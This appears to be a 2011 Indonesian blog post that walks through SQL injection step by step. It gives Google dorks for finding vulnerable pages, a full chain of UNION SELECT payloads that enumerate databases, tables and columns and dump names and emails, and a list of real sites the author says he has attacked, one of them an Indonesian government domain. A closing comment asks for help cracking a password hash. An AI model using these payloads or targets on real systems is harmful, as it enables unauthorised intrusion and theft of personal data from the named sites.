Artikel ini saya tulis sekedar mengingatkan saya saja langkah-langkah dari teknik SQL injection. anda yang lebih bijaksana.
Dork yang saya gunakan :
- inurl:read.php?id=
- inurl:news.php?id=
Langkah-langkah yang saya kerjakan :
- cek error vurnebility http://www.target.co.id/news.php?id=91′
- cek kolom http://www.target.co.id/news.php?id=91 order by 1
- cek kolom aktif http://www.target.co.id/news.php?id=-91+UNION+SELECT+1,2,3,4,5–
- cek versi database http://www.target.co.id/news.php?id=-91+UNION+SELECT+1,@@version,3,4,5–
- cek database yang ada http://www.target.co.id/news.php?id=-91+UNION+SELECT+1,group_concat(schema_name),3,4,5 from information_schema.schemata–
- cek database yang digunakan http://www.target.co.id/news.php?id=-91+UNION+SELECT+1,concat(database()),3,4,5 from information_schema.schemata–
- cek semua tabel http://www.target.co.id/news.php?id=-91+UNION+SELECT+1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()–
- cek semua field http://www.target.co.id/news.php?id=-91+UNION+SELECT+1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()–
- cek isi field http://www.target.co.id/news.php?id=-91+UNION+SELECT+1,group_concat(nama,0x3a,email),3,4,5 from u1637_product.guestbook–
Tutorial yang saya pakai :
http://www.binushacker.net/sql-injection-tutorial.html
Situs yang pernah saya kunjungi :
- http://www.skw.co.id/news.php?id=91
- http://www.krlmania.com/sinyal/read.php?id=2003
- http://ciputatbisnis.com/news.php?id=82
- http://www.bakorkamla.go.id/news.php?id=595
- http://www.patriciapiccinini.net/news.php?id=46
- http://www.archdioceseofcolombo.com/news.php?id=851
- http://www.dhammaweb.net/Tipitaka/read.php?id=13
Referensi yang saya baca :
Capture :
http://www.4shared.com/file/VauozsYD/capture.html
Sekian dari saya semoga ada manfaatnya untuk teman-teman dan anda semua…aamin
Depok, 17-04-2011
noname
Filed under: Komputer Tagged: | injection, Langkah, tutorial
Sonora Jakarta
Tau Gak Ini Di Encrypt pakai apa . . bd9058889d0804bddf2d9f30455199e2
kalau bisa Decryptkan . . mohon bantuannya